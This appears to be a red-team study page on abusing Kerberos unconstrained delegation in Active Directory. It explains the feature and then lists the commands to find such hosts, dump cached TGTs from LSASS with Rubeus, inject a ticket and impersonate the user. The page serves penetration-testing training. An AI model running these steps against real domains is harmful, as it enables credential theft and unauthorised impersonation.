Unconstrained Delegation

Unconstrained Delegation is a feature in the Kerberos authentication protocol that allows a service to request a Service Ticket for ANY service on behalf of a user.

The Trust this computer for delegation to any service (Kerberos only) privilege must be enabled in the Delegation tab within the object/computer's properties.

Unconstrained Delegation properties [Image From CRTO]

When delegation is enabled on a computer, the Key Distribution Center will include a copy of the user's Ticket Granting Ticket inside the Service Ticket. When a user authenticates to the target service using the Service Ticket, their Ticket Granting Ticket will be cached in memory on the computer hosting the service for future delegation use.

The goal is to identify and gain access to machines allowing unconstrained delegation in order to extract cached Ticket Granting Tickets that can be used to request a Service Ticket for any other service on behalf of the user.

Enumeration

LogoGitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub
Linux (Attacker)
findDelegation.py [domain]/[username]:[password]

Exploit

LogoGitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub
LogoGitHub - S3cur3Th1sSh1t/SharpImpersonation: A User Impersonation tool - via Token or Shellcode injectionGitHub
Windows (Target)
## Show Cached Tickets
Rubeus.exe triage

## Extract The TGT Using Its LUID (/nowrap To Make It Copy Friendly)
Rubeus.exe dump /luid:0x14794e /nowrap

## Create A Process And Inject The Dumped TGT
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:weelee.zip /username:weelee /password:AnyPassword /ticket:[tgt]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"

You must have elevated privileges on the target computer in order to dump TGTs from LSASS.

PreviousKerberos DelegationNextConstrained Delegation

Last updated